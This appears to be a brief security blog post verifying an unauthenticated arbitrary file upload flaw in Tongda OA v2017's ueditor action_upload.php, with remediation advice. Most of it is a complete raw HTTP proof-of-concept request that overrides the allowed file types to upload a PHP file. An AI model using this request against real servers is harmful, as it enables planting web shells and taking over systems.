Vulnerability Verification - Tongda OA front-end module/ueditor/php/action_upload.php arbitrary file upload

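I. Vulnerability Description

In Tongda OA v2017, action_upload.php filters uploaded files insufficiently and requires no back-end privileges, which results in an arbitrary file upload vulnerability.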

II. Vulnerable URL

http://XXXX/module/ueditor/php/action_upload.php?action=uploadfile

III. Proof of Concept (PoC)

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Content-Length: 881

-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

tcmd
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream

123456
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"

submit
-----------------------------55719851240137822763221368724--

IV. Vulnerability Verification

V. Remediation

1. Contact the vendor and upgrade to the latest secure version: https://www.tongda2000.com/.

posted @ 2025-02-24 09:24  Domren